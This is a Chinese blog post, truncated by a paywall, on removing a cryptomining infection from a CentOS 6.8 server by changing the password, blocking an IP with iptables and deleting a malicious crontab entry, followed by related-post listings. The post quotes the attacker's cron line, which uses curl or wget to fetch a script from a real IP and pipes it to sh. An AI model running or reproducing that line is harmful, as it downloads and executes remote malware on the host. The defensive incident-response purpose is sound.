centos6.8服务器中了挖矿程序病毒的解决方法

最新推荐文章于 2024-06-13 10:23:16 发布
最新推荐文章于 2024-06-13 10:23:16 发布
阅读量916 收藏 1
点赞数
分类专栏: shell ubuntu 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/emtit2008/article/details/100537488
版权

阿里云提示我的centos服务器出现紧急安全事件:挖矿程序;同时也出现服务器异常登录事件。

出现这样的情况,需要根据以下的步骤去处理

第一步:修改登录的帐号密码,输入命令passwd,根据提未修改。

第二步:禁用可疑的IP,阿里云会有一些IP提示,先把异常登录的IP禁用;命令如下

iptables -I INPUT -s 68.183.140.39 -j DROP  //禁用指定的IP

iptables -L -n -v //查看防火墙当前的状态

第三步:删除挖矿病毒程序,大部分的程序无法是常驻内部并且增加一个守护进程,或者直接在crontab中加入定时任务;

我们先解决最简单的,把crontab中的可疑定时任务删除。

输入crontab -e查看,发现以下的定时任务

*/15 * * * * (/usr/bin/uzmnfa4||/usr/libexec/uzmnfa4||/usr/local/bin/uzmnfa4||/tmp/uzmnfa4||curl -m180 -fsSL http://68.183.140.39:8000/i.sh||wget -q -T180 -O- http://68.183.140.39:8000/i.sh) | sh

根据此命令去查找相应的病毒文件,使用rm命令把存的非法文件删除

rm /usr/bin/uzmnfa4  //其它的文件类同,

其中curl -m180 -fsSL http://68.183.140.39:8000/i.sh和wget -q -T180 -O

最低0.47元/天 解锁文章
PHP黄建文
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Linux 挖矿程序病毒文件锁住了,删不了,怎么破?(chattr)
LuciferLiu_DBA
09-12 2795
每天一个 DBA 小知识,助你更进一步!
Centos7 处理挖矿病毒初探
wolf1105的博客
08-15 7109
1、首先查看top命令下占用cpu最高的是什么进程 #top #lsof 进程名 如果是挖矿程序可以看到明显的异常 具体lsof的用法 请参考 https://www.cnblogs.com/sparkbj/p/7161669.html 确定挖矿程序的路径以后,先kill掉进程,再删除文件 #kill -9 555 #rm -rf /tmp/wakuang.sh 2、清理定时任务 一般只...
centos8 处理挖矿程序攻击
Wangthebest的专栏
05-30 1405
ll /usr/bin/top* top命令被修改,并且隐藏了两个进程 chattr命令不可用,先删除e2fsprogs再重新安装。 yum remove e2fsprogs #rpm -qa|grep e2fsprogs yum -y install e2fsprogs #yum install e2fsprogs-1.45.6-2.el8.x86_64 解锁TOP文件并恢复 chattr -i top mv top top.rm mv top.lanigiro top 4.
如何在centos和windows server找到挖矿木马和消灭挖矿木马
最新发布
weixin_45631123的博客
06-13 778
解决挖矿木马
centos7挖矿病毒(xmrig,javs)清理
yuanwendong11的博客
07-26 3606
1. 查看计划任务 ls /var/spool/cron 删除异常任务其配置项。如果当前系统之前并未配置过计划任务,可以直接删除计划脚本目录即可: rm -rf /var/spool/cron/* 2. 查看密钥认证文件 删除木马创建的密钥认证文件,如果当前系统之前并未配置过密钥认证,可以直接清空认证存放目录: rm -rf /root/.ssh/* 如果有配置过密钥认证,需要删除指定的黑客创建的认证文件即可。 3. 修复 SSH 配置项 一般默认脚本进行修改的 PermitRootLogin、R.
centos清理挖矿病毒[crypto][pnscan]
技术研究中心
07-16 1559
centos清理挖矿病毒[crypto][pnscan] 新买的云服务器cpu占用100%,瞬间想到挖矿木马。 排查过程如下: 1、top命令查看进程占用情况,没有发现可疑进程,而且cpu的total used也是正常的,但cpu占用率是100%,显然,木马进程被恶意隐藏了,常规的ps命令肯定找不到。 2、想到挖矿木马都有一个特点,都会连接到外网,于是执行netstat -anptl命令,但提示没权限,狗日的netstat不能用了 3、想到使用chattr -i /usr/bin/netstat,但提示没权
主机有被植入挖矿病毒篡改系统库文件
eagle89的专栏
04-08 1050
主机有被植入挖矿病毒篡改系统库文件
服务器挖矿了怎么办,实战清退
qq_14926283的博客
03-25 1479
然后看看有没有定时任务,有的时候它会定时去检测xmrig挖矿木马是否在正常运行,不正常它会重新去做一系列的处理,重新植入木马,这时候我们要去取消这些定时任务。注意这些看起来像系统进程的最好不要kill掉,容易出现意外,把生产环境的服务给干费了,那我们得去删掉这个后门用户怎么办。可以看到我这边有一个名为xmrig(有经验的这里看到名字直接就能判断)的进程霸占了100.3的资源,这里招了。第一时间重启服务是不行的,这些挖矿木马一定是会伴随着你的重启而自动重启,一定时间内重新霸占你的服务器资源。
centos 处理挖矿病毒
weixin_44606690的博客
01-04 497
处理挖矿病毒,真的恶心啊占用CPU百分之50
Linux挖矿病毒清理通用思路
dayouzi的博客
04-19 3698
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
Centos挖矿病毒处理过程
2301_77388529的博客
04-03 898
服务器系统毒后一般会出现异常进程,负载高,CPU占用高,带宽跑满的情况, 为防止你的服务器招建议服务器 FTP 数据库 网站 Redis等请勿使用简单的密码 轻的只会跑资源 严重的删网站删库 下面说下毒的处理流程。建议:处理完成之后备份好数据重装系统,病毒作者可能还留有后门,重装系统后加强密码 服务器管理 安装相应的防御软件 希望该教程能让你get到技能。rm /bin/dhpcd ###确定该进程不是自己安装的删除该文件,不确定可以先mv到其他目录。直接使用”dd”,删除计划任务。
CentOS7 服务器分析挖矿病毒,清理挖矿病毒 tor2web
dkgee
12-13 4425
特征如下: CPU占用一直比较高,初步分析是挖矿程序: 系统的crontab –l显示调度列表如下: 20 * * * * /root/.aliyun.sh >/dev/null 2>&1 查看脚本内容: #!/bin/bash exec &>/dev/null echo ZXhlYyAmPi9kZXYvbnVsbApleHBvcnQgUEFU...
高级运维开发工程师带你处理linux木马(挖矿病毒)实战例子
nasen512的博客
07-10 2549
高级运维开发工程师带你处理linux木马(挖矿病毒)实战例子。
详解Linux防火墙iptables禁IP与解封IP常用命令
wejack的专栏
12-02 4089
文章系转载,便于整理和归纳,源文地址:https://cloud.tencent.com/developer/article/1722230 在Linux服务器被攻击的时候,有的时候会有几个主力IP。如果能拒绝掉这几个IP的攻击的话,会大大减轻服务器的压力,说不定服务器就能恢复正常了。 在Linux下封停IP,有封杀网段和封杀单个IP两种形式。一般来说,现在的攻击者不会使用一个网段的IP来攻击(太招摇了),IP一般都是散列的。于是下面就详细说明一下封杀单个IP的命令,和解封单个IP的命令。 Linux防.
centos7系统服务器 ---- kworkerds挖矿病毒排查过程
跪下叫我怕怕的博客
03-04 7760
kworkerds挖矿病毒排查过程 2019年3月2日晚上,收到报警邮件,出现多台服务器cpu使用率超过百分之九十五现象。登录服务器查看,发现存在cpu使用率超高的进程kworkerds 的存在,不用多说,这个名字只要是接触过挖矿病毒的运维人员都知道,那么下面开始排查及清理。 了此病毒服务器有两种(目前发现)情况: 第一种,使用top命令可以直接查看到是哪个进程在消耗CPU资源; 第二种,使用...
服务器挖矿病毒查杀排查手册
JINGXI的博客
04-08 437
服务器挖矿病毒排查手册
linux centos7 解决挖矿病毒kthreaddk 高CPU占用
m0_66127371的博客
09-30 1770
病毒修复
CentOS处理挖矿病毒 - kthreaddk
HoZanDung的博客
03-22 1158
CentOS处理挖矿病毒 - kthreaddk
CentOS6.8在VMware上的详细安装教程
"本资源为CentOS6.8系统在VMware上的安装教程,包括VMware的安装和虚拟机配置,以及CentOS6.8的安装步骤。" 在本文,我们将详细介绍如何在Windows系统上使用VMware安装CentOS6.8的操作系统。VMware是一款强大的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值